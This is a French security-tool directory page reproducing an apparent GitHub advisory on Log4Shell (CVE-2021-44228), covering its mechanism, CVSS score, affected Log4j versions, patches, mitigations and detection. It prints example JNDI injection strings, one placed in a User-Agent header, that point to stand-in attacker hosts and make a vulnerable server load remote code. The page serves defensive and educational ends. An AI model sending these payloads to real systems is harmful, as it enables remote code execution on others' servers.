Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228 — CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2021-44228
Analyse des VulnérabilitésExploitationExploitation d'Applications WebRenseignement sur les MenacesApprentissage et ÉducationRessources Organisées
GitHub0xblackash/cve-2021-44228

CVE-2021-44228

CVE-2021-44228

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2021-44228 — « Log4Shell »

ChatGPT Image Jun 14, 2026, 02_56_45 PM

Severity CVSS Type Date

Une vulnérabilité critique d'exécution de code à distance dans Apache Log4j 2, largement connue sous le nom de Log4Shell.


📖 Table des matières

  • Aperçu
  • Détails techniques
  • Sévérité et CVSS
  • Versions affectées
  • Exploitation et impact
  • Impact dans le monde réel
  • Détection
  • Correction et correctifs
  • Résumé

🔎 Aperçu

CVE-2021-44228 est une vulnérabilité RCE critique dans Apache Log4j 2 version 2.x (avant la 2.15.0), découverte en décembre 2021.

Elle permet à des attaquants distants non authentifiés d'exécuter du code arbitraire sur des systèmes vulnérables simplement en envoyant une entrée spécialement conçue qui est enregistrée par Log4j. La faille affecte d'innombrables applications et services basés sur Java dans le monde entier.


🧠 Détails techniques

Télécharger l’outil

La vulnérabilité provient de la gestion par Log4j des recherches JNDI dans les chaînes enregistrées. Un attaquant peut intégrer une ressource JNDI malveillante dans un message enregistré (par exemple LDAP, DNS), comme :

root@kitploit:~

${jndi:ldap://attaquant.com/a}

Log4j va :

  1. Analyser la recherche JNDI à partir de l'entrée
  2. Effectuer une recherche distante vers le serveur contrôlé par l'attaquant
  3. Charger du code Java malveillant dans le cadre du processus de recherche
  4. Exécuter ce code dans le contexte de l'application vulnérable

Cela permet à un attaquant d'obtenir une exécution de code à distance (RCE) complète sur les services affectés.


📊 Sévérité et CVSS

MétriqueDétail
Score de base CVSS v3.110.0 (Critique)
Vecteur d'attaqueRéseau
Privilèges requisAucun
Interaction utilisateurAucune
AuthentificationNon requise
ImpactRCE complète

Étant donné que Log4j est utilisé dans d'innombrables bibliothèques et applications, tout système qui enregistre des données non fiables pourrait être vulnérable.


📦 Versions affectées

Les versions suivantes de Log4j 2 sont vulnérables :

root@kitploit:~

> = 2.0-beta9 et < 2.15.0

De plus, certaines configurations de 2.15.0 étaient encore exploitables, donc 2.16.0 et ultérieures constituent la référence sécurisée.


🛠 Correction et correctifs

✅ Versions officielles corrigées

Mettez à jour vers les versions de Log4j 2 :

root@kitploit:~

2.17.1 ou ultérieure

Des correctifs ultérieurs améliorent encore la sécurité (par exemple 2.17.2, 2.19.0, etc.).


🧱 Atténuations temporaires (si vous ne pouvez pas appliquer le correctif immédiatement)

Si une mise à jour immédiate n'est pas possible, vous pouvez :

  • Désactiver les recherches JNDI dans la configuration de Log4j
  • Définir :
root@kitploit:~

log4j2.formatMsgNoLookups=true

  • Supprimer la classe JndiLookup du classpath :
root@kitploit:~

zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Ces étapes aident à réduire l'exposition jusqu'à ce que vous puissiez effectuer la mise à jour.


🔥 Exploitation et impact

nessus3
nessus4
nessus5

Cette vulnérabilité est extrêmement facile à exploiter. Un attaquant n'a qu'à envoyer une chaîne spécialement conçue (par exemple via des en-têtes HTTP, des paramètres de formulaire, des messages de chat, des champs de base de données) qui sera enregistrée par l'application :

root@kitploit:~

User-Agent: ${jndi:ldap://attaquant.example/a}

Une fois enregistrée, l'application effectuera une recherche distante et pourra être forcée à exécuter du code Java contrôlé par l'attaquant.


🌍 Impact dans le monde réel

Log4Shell a eu un impact mondial massif :

  • D'innombrables services publics ont été immédiatement exposés
  • Les fournisseurs de cloud, les serveurs de jeux, les applications d'entreprise, l'IoT, les services Web, les API, etc. ont été affectés
  • Des communautés de sécurité entières se sont mobilisées pour détecter et corriger les systèmes vulnérables
  • L'exploitation a été généralisée, automatisée et rapide

C'est l'une des vulnérabilités les plus significatives de ces dernières décennies.


🧪 Détection

Vous pouvez détecter les systèmes vulnérables en :

  • Analysant les journaux pour des motifs JNDI suspects (${jndi:)
  • Utilisant des scanners de vulnérabilités qui vérifient les versions de Log4j
  • Surveillant le trafic entrant pour des tentatives d'exploitation
  • Vérifiant le contenu du classpath pour la prise en charge des recherches JNDI

📌 Résumé

ChampValeur
ID CVECVE-2021-44228
SurnomLog4Shell
ProduitApache Log4j 2
SévéritéCritique (CVSS 10.0)
TypeExécution de code à distance
ImpactCompromission complète du système
ExploitabilitéExtrêmement facile
AtténuationMettre à jour vers ≥ 2.17.1

⚠️ Avis final

Si votre application ou toute bibliothèque que vous utilisez repose sur Log4j 2.x, mettez à jour immédiatement vers une version corrigée (≥ 2.17.1) et vérifiez que les recherches JNDI sont désactivées ou supprimées lorsque c'est possible.